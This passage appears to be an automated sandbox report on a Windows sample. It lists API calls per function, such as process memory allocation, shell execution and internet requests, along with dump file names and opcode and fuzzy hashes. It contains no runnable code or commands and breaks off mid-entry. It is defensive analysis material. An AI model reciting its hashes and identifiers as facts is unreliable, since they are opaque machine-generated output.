                            • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                            • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                            • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                          • String ID: @
                          • API String ID: 4150878124-2766056989
                          • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                          • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                          • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                          • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: \$]$h
                          • API String ID: 4104443479-3262404753
                          • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                          • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                          • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                          • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                          APIs
                          • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                          • CloseHandle.KERNEL32(?), ref: 00457E09
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                          • String ID: <$@
                          • API String ID: 2417854910-1426351568
                          • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                          • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                          • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                          • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                          APIs
                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                          • String ID:
                          • API String ID: 3705125965-3916222277
                          • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                          • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                          • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                          • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                          APIs
                          • GetMenuItemInfoW.USER32 ref: 0045FAC4
                          • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                          • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem
                          • String ID: 0
                          • API String ID: 135850232-4108050209
                          • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                          • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                          • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                          • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                          • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                          • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                          • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                          • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                          APIs
                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$Window
                          • String ID: SysMonthCal32
                          • API String ID: 2326795674-1439706946
                          • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                          • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                          • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                          • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                          APIs
                          • DestroyWindow.USER32(00000000), ref: 00450A2F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 3375834691-2298589950
                          • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                          • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                          • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                          • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: $<
                          • API String ID: 4104443479-428540627
                          • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                          • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                          • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                          • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID: \VH
                          • API String ID: 1682464887-234962358
                          • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                          • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                          • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                          • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID: \VH
                          • API String ID: 1682464887-234962358
                          • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                          • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                          • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                          • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID: \VH
                          • API String ID: 1682464887-234962358
                          • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                          • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                          • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                          • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume
                          • String ID: \VH
                          • API String ID: 2507767853-234962358
                          • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                          • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                          • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                          • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorMode$InformationVolume
                          • String ID: \VH
                          • API String ID: 2507767853-234962358
                          • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                          • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                          • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                          • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                          • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                          • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                          • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                          APIs
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                          • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                          • String ID: crts
                          • API String ID: 943502515-3724388283
                          • Opcode ID: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                          • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                          • Opcode Fuzzy Hash: 529e37b86e0cb06f9ed43835dc92f00344189a4a835cae890eb44c126e03fe94
                          • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                          • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                          • SetErrorMode.KERNEL32(?), ref: 0045D35C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
